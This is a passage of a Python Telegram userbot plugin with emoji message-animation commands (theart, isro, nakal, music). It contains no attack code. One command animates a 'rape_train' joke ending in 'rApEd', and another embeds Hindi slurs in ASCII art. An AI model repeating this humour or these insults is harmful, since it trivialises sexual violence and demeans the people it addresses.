"◼️◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️◼️◼️️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️◼️◼️◼️🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️◼️",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️◼️◼️",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️◼️\n◼️🔴🔵🌕♓♎⛎◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️🔴🔵🌕♓♎⛎◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️\n◼️◼️◼️◼️\n◼️◼️◼️◼️\n◼️◼️◼️◼️",
"◼️◼️◼️\n◼️◼️◼️\n◼️◼️◼️",
"◼️◼️\n◼️◼️",
"◼️"
    ]
    for i in animation_ttl:
        await asyncio.sleep(animation_interval)
        await event.edit(animation_chars[i % 30])
@borg.on(admin_cmd(pattern=r"repe$", outgoing=True))
async def _(event):
    if event.fwd_from:
        return
    animation_interval = 0.2
    animation_ttl = range(0, 30)
    await event.edit("repe")
    animation_chars = [
"**r**",
"**ra**",
"**rap**",
"**rape**",
"**rape_**",
"**rape_t**",
"**rape_tr**",
"**rape_tra**",
"**rape_trai**",
"**rape_train**",
"**ape_train🚅**",
"**pe_train🚅🚃🚃**",
"**e_train🚅🚃🚃🚃**",
"**_train🚅🚃🚃🚃🚃**",
"**train🚅🚃🚃🚃🚃🚃**",
"**rain🚅🚃🚃🚃🚃🚃🚃**",
"**ain🚅🚃🚃🚃🚃🚃🚃🚃**",
"**in🚅🚃🚃🚃🚃🚃🚃🚃🚃**",
"**n🚅🚃🚃🚃🚃🚃🚃🚃🚃🚃**",
"🚅🚃🚃🚃🚃🚃🚃🚃🚃🚃",
"🚃🚃🚃🚃🚃🚃🚃🚃🚃",
"🚃🚃🚃🚃🚃🚃🚃🚃",
"🚃🚃🚃🚃🚃🚃🚃",
"🚃🚃🚃🚃🚃🚃",
"🚃🚃🚃🚃🚃",
"🚃🚃🚃🚃",
"🚃🚃🚃",
"🚃🚃",
"🚃",
"**rApEd**"
    ]
    for i in animation_ttl:
        await asyncio.sleep(animation_interval)
        await event.edit(animation_chars[i % 30])
@borg.on(admin_cmd(pattern=r"theart$", outgoing=True))
async def _(event):
    if event.fwd_from:
        return
    animation_interval = 0.1
    animation_ttl = range(0, 117)
    animation_chars = [
"❤️",
"🧡",
"💛",
"💚",
"💙",
"💜",
"🖤",
"💘",
"💝",
"❤️",
"🧡",
"💛",
"💚",
"💙",
"💜",
"🖤",
"💘",
"💝"
    ]
    for i in animation_ttl:
        await asyncio.sleep(animation_interval)
        # The list has 18 frames; the original `i % 100` would raise
        # IndexError once i reached 18.
        await event.edit(animation_chars[i % 18])
@borg.on(admin_cmd(pattern=f"isro$"))
async def _(event):
    if event.fwd_from:
        return
    animation_interval = 1
    animation_ttl = range(0, 24)
    await event.edit("Connecting..")
    animation_chars = [
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n🚀⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛🚀⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛🚀⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🚀⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛🚀⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛🚀\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"🛸⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n🛸⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛🛸⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛🛸⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛🛸⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🛸⬛⬛",
"⬛⬛⬛🛸⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🛸⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🛸⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🛸⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🛸⬛⬛\n⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🛸⬛🚶♂️\n⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🛸🚶♂️⬛\n⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n👽⬛⬛🛸🚶♂️⬛\n⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛👽⬛🛸🚶♂️⬛\n⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛\n⬛⬛👽🛸🚶♂️⬛\n⬜⬜⬜⬜⬜⬜",
"__Signal Lost....__"
    ]
    for i in animation_ttl:
        await asyncio.sleep(animation_interval)
        await event.edit(animation_chars[i % 24])
@borg.on(admin_cmd(pattern=f"nakal$", outgoing=True))
async def _(event):
    if event.fwd_from:
        return
    animation_interval = 0.5
    animation_ttl = range(0, 6)
    await event.edit("nakal")
    animation_chars = [
"`⠀⠀⠀⣠⣶⡾⠏⠉⠙⠳⢦⡀⠀⠀⠀⢠⠞⠉⠙⠲⡀⠀\n ⠀⣴⠿⠏⠀⠀⠀⠀⠀ ⢳⡀⠀⡏⠀⠀⠀ ⠀⢷\n⢠⣟⣋⡀⢀⣀⣀⡀⠀⣀⡀⣧⠀⢸⠀⠀⠀ ⠀ ⡇\n⢸⣯⡭⠁⠸⣛⣟⠆⡴⣻⡲⣿ ⣸ Nikal ⡇\n ⣟⣿⡭⠀⠀⠀⠀⠀⢱⠀⠀ ⣿ ⢹⠀ ⡇\n ⠙⢿⣯⠄⠀⠀⠀__⠀⠀⡿ ⠀⡇⠀⠀⠀⠀ ⡼\n⠀⠀⠀⠹⣶⠆⠀⠀⠀⠀⠀⡴⠃⠀ ⠘⠤⣄⣠⠞⠀\n⠀⠀⠀⠀⢸⣷⡦⢤⡤⢤⣞⣁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⢀⣤⣴⣿⣏⠁⠀⠀⠸⣏⢯⣷⣖⣦⡀⠀⠀⠀⠀⠀⠀\n⢀⣾⣽⣿⣿⣿⣿⠛⢲⣶⣾⢉⡷⣿⣿⠵⣿⠀⠀⠀⠀⠀⠀\n⣼⣿⠍⠉⣿⡭⠉⠙⢺⣇⣼⡏⠀⠀ ⠀⣄⢸⠀⠀⠀⠀⠀⠀`",
"`⠀⠀⠀⣠⣶⡾⠏⠉⠙⠳⢦⡀⠀⠀⠀⢠⠞⠉⠙⠲⡀⠀\n ⠀⣴⠿⠏⠀⠀⠀⠀⠀ ⠀⢳⡀⠀⡏⠀⠀⠀ ⠀⢷\n⢠⣟⣋⡀⢀⣀⣀⡀⠀⣀⡀⣧⠀⢸⠀⠀⠀ ⡇\n⢸⣯⡭⠁⠸⣛⣟⠆⡴⣻⡲⣿ ⣸ Lavde ⡇\n ⣟⣿⡭⠀⠀⠀⠀⠀⢱⠀⠀ ⣿ ⢹⠀ ⡇\n ⠙⢿⣯⠄⠀⠀|__|⠀⠀⡿ ⠀⡇⠀⠀⠀⠀ ⡼\n⠀⠀⠀⠹⣶⠆⠀⠀⠀⠀⠀⡴⠃⠀ ⠘⠤⣄⣠⠞⠀\n⠀⠀⠀⠀⢸⣷⡦⢤⡤⢤⣞⣁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⢀⣤⣴⣿⣏⠁⠀⠀⠸⣏⢯⣷⣖⣦⡀⠀⠀⠀⠀⠀⠀\n⢀⣾⣽⣿⣿⣿⣿⠛⢲⣶⣾⢉⡷⣿⣿⠵⣿⠀⠀⠀⠀⠀⠀\n⣼⣿⠍⠉⣿⡭⠉⠙⢺⣇⣼⡏⠀⠀ ⠀⣄⢸⠀⠀⠀⠀⠀⠀`",
"`⠀⠀⠀⣠⣶⡾⠏⠉⠙⠳⢦⡀⠀⠀⠀⢠⠞⠉⠙⠲⡀⠀\n ⠀⣴⠿⠏⠀⠀ ⠀⢳⡀⠀⡏⠀⠀ ⠀⢷\n⢠⣟⣋⡀⢀⣀⣀⡀⠀⣀⡀⣧⠀⢸⠀⠀⠀⠀ ⡇\n⢸⣯⡭⠁⠸⣛⣟⠆⡴⣻⡲⣿ ⣸ Pehli ⡇\n ⣟⣿⡭⠀⠀⠀⠀⠀⢱⠀⠀ ⣿ ⢹⠀ ⡇\n ⠙⢿⣯⠄⠀⠀(P)⠀⠀⡿ ⠀⡇⠀⠀⠀⠀ ⡼\n⠀⠀⠀⠹⣶⠆⠀⠀⠀⠀⠀⡴⠃⠀ ⠘⠤⣄⣠⠞⠀\n⠀⠀⠀⠀⢸⣷⡦⢤⡤⢤⣞⣁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⢀⣤⣴⣿⣏⠁⠀⠀⠸⣏⢯⣷⣖⣦⡀⠀⠀⠀⠀⠀⠀\n⢀⣾⣽⣿⣿⣿⣿⠛⢲⣶⣾⢉⡷⣿⣿⠵⣿⠀⠀⠀⠀⠀⠀\n⣼⣿⠍⠉⣿⡭⠉⠙⢺⣇⣼⡏⠀⠀ ⠀⣄⢸⠀⠀⠀⠀⠀⠀`",
"`⠀⠀⠀⣠⣶⡾⠏⠉⠙⠳⢦⡀⠀⠀⠀⢠⠞⠉⠙⠲⡀⠀\n ⠀⣴⠿⠏⠀⠀ ⠀⢳⡀⠀⡏⠀⠀ ⠀⢷\n⢠⣟⣋⡀⢀⣀⣀⡀⠀⣀⡀⣧⠀⢸⠀ ⠀ ⡇\n⢸⣯⡭⠁⠸⣛⣟⠆⡴⣻⡲⣿ ⣸ Fursat ⡇\n ⣟⣿⡭⠀⠀⠀⠀⠀⢱⠀ ⣿ ⢹⠀ ⡇\n ⠙⢿⣯⠄⠀⠀⠀__ ⠀⠀⡿ ⠀⡇⠀⠀⠀⠀ ⡼\n⠀⠀⠀⠹⣶⠆⠀⠀⠀⠀⠀⡴⠃⠀ ⠘⠤⣄⣠⠞⠀\n⠀⠀⠀⠀⢸⣷⡦⢤⡤⢤⣞⣁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⢀⣤⣴⣿⣏⠁⠀⠀⠸⣏⢯⣷⣖⣦⡀⠀⠀⠀⠀⠀⠀\n⢀⣾⣽⣿⣿⣿⣿⠛⢲⣶⣾⢉⡷⣿⣿⠵⣿⠀⠀⠀⠀⠀⠀\n⣼⣿⠍⠉⣿⡭⠉⠙⢺⣇⣼⡏⠀⠀ ⠀⣄⢸⠀⠀⠀⠀⠀⠀`",
"`⠀⠀⠀⣠⣶⡾⠏⠉⠙⠳⢦⡀⠀⠀⠀⢠⠞⠉⠙⠲⡀⠀\n ⠀⣴⠿⠏⠀⠀⠀⠀⠀ ⢳⡀⠀⡏⠀⠀ ⠀⢷\n⢠⣟⣋⡀⢀⣀⣀⡀⠀⣀⡀⣧⠀⢸⠀⠀ ⠀ ⡇\n⢸⣯⡭⠁⠸⣛⣟⠆⡴⣻⡲⣿ ⣸ Meeee ⡇\n ⣟⣿⡭⠀⠀⠀⠀⠀⢱⠀⠀ ⣿ ⢹⠀ ⡇\n ⠙⢿⣯⠄⠀⠀|__| ⠀⡿ ⠀⡇⠀⠀⠀⠀ ⡼\n⠀⠀⠀⠹⣶⠆⠀⠀⠀⠀⠀⡴⠃⠀ ⠘⠤⣄⣠⠞⠀\n⠀⠀⠀⠀⢸⣷⡦⢤⡤⢤⣞⣁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⢀⣤⣴⣿⣏⠁⠀⠀⠸⣏⢯⣷⣖⣦⡀⠀⠀⠀⠀⠀⠀\n⢀⣾⣽⣿⣿⣿⣿⠛⢲⣶⣾⢉⡷⣿⣿⠵⣿⠀⠀⠀⠀⠀⠀\n⣼⣿⠍⠉⣿⡭⠉⠙⢺⣇⣼⡏⠀⠀ ⠀⣄⢸⠀⠀⠀⠀⠀⠀`",
"`⠀⠀⠀⣠⣶⡾⠏⠉⠙⠳⢦⡀⠀⠀⠀⢠⠞⠉⠙⠲⡀⠀\n ⠀⣴⠿⠏⠀⠀⠀⠀⠀ ⠀⢳⡀⠀⡏⠀⠀ ⠀⢷\n⢠⣟⣋⡀⢀⣀⣀⡀⠀⣀⡀⣧⠀⢸⠀ ⠀ ⡇\n⢸⣯⡭⠁⠸⣛⣟⠆⡴⣻⡲⣿ ⣸ Nikal ⡇\n ⣟⣿⡭⠀⠀⠀⠀⠀⢱⠀ ⣿ ⢹⠀ ⡇\n ⠙⢿⣯⠄⠀⠀lodu⠀⠀⡿ ⠀⡇⠀⠀⠀⠀ ⡼\n⠀⠀⠀⠹⣶⠆⠀⠀⠀⠀⠀⡴⠃⠀ ⠘⠤⣄⣠⠞⠀\n⠀⠀⠀⠀⢸⣷⡦⢤⡤⢤⣞⣁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⢀⣤⣴⣿⣏⠁⠀⠀⠸⣏⢯⣷⣖⣦⡀⠀⠀⠀⠀⠀⠀\n⢀⣾⣽⣿⣿⣿⣿⠛⢲⣶⣾⢉⡷⣿⣿⠵⣿⠀⠀⠀⠀⠀⠀\n⣼⣿⠍⠉⣿⡭⠉⠙⢺⣇⣼⡏⠀⠀ ⠀⣄⢸⠀⠀⠀⠀⠀⠀`",
    ]
    for i in animation_ttl:
        await asyncio.sleep(animation_interval)
        await event.edit(animation_chars[i % 6])
@borg.on(admin_cmd(pattern=f"music$", outgoing=True))
async def _(event):
    if event.fwd_from:
        return
    animation_interval = 1.5
    animation_ttl = range(0, 11)
    await event.edit("starting player...")
    animation_chars = [
"⬤⬤⬤ 81% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:00** ▱▱▱▱▱▱▱▱▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `▶️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤⬤ 81% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:01** ▰▱▱▱▱▱▱▱▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
